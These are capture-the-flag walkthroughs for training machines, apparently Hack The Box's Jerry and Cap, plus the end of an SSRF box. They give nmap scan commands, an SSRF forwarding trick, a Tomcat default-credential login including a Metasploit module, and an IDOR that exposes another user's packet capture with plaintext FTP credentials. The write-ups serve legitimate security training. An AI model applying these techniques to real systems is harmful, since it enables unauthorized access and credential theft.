Using the vulnerable application, we exploit the SSRF by creating a basket that forwards requests to http://localhost:80, reaching the web server on port 80 that we cannot reach directly.

We create the basket from the main page; the application returns a token for it. Then we open the basket's settings and set the forward URL to our target, http://127.0.0.1:80, enabling the option to proxy the response so that the upstream's answer is returned to us instead of only being recorded.

Then, requesting the basket's endpoint in the browser returns the page served on port 80.

At the bottom of that page we see the name of the software.

Jerry

· 4 min read

Task1

Which TCP port is open on the remote host?

Run nmap to scan for ports

nmap -sS -p- <target_ip>

After scanning, port 8080 is revealed to be open; nmap labels it http-proxy, its default service name for that port.

Task 2

Which web server is running on the remote host? Looking for two words.

To find the web server we add version detection to the nmap scan.

nmap -sV -p 8080 <target_ip>

We see on the version that the web server is Apache Tomcat.

Task 3

Which relative path on the webserver leads to the Web Application Manager?

Open a browser and navigate to the target's IP address, specifying port 8080.

Look around the default Tomcat page. Under "Managing Tomcat" there is a link to the manager webapp, which is what the question calls the Web Application Manager. The page states that, for security, access is restricted and users are defined in $CATALINA_HOME/conf/tomcat-users.xml. That is worth remembering, but first we follow the link: it redirects to /manager/html and prompts for credentials. That is the relative path the question asks for.

Task 4

What is the valid username and password combination for authenticating into the Tomcat Web Application Manager? Give the answer in the format of username:password

In the previous step we were asked for credentials at /manager/html. Since we could not authenticate, the page shows an example of how to add the manager role to a user in tomcat-users.xml. Trying those example credentials on the login prompt works!

Another approach is the Metasploit Framework. Run msfconsole, then search tomcat. Among the results is auxiliary/scanner/http/tomcat_mgr_login, which attempts logins from a list of username/password pairs. Select it with use <number_of_option>, then show options lists what has to be set.

Set the target with set RHOSTS <target_ip> and set RPORT <target_port>, then type run; one login attempt is successful, with the same credentials found before.

Cap

· 3 min read

Task 1

How many TCP ports are open?

nmap -sS -p- <ip_address>

  • -sS: SYN ("stealth") scan, which does not complete the TCP handshake and is the fastest way to scan TCP ports.
  • -p-: scan all 65535 TCP ports instead of the default top 1000.

After scanning, 3 TCP ports show as open.

Task 2

After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

Open the hamburger menu and click Security Snapshot (5 Second PCAP + Analysis).

This redirects to a URL of the form /data/[id], so [something] is data.

Task 3

Are you able to get to other users' scans?

Try changing the id in the URL from the one assigned to you to another value. With id 0 you see a different dashboard, which means the application does not check that the scan belongs to you (an insecure direct object reference) and you can get to other users' scans.

Task 4

What is the ID of the PCAP file that contains sensitive data?

The dashboard found before with id equal to 0 is the one that contains sensitive data.

Task 5

Which application layer protocol in the pcap file can the sensitive data be found in?

Download the PCAP from the dashboard with id 0 and open it in Wireshark. Inspecting the packets, you soon find the sensitive data in the FTP traffic, where a login request sends the password in plain text.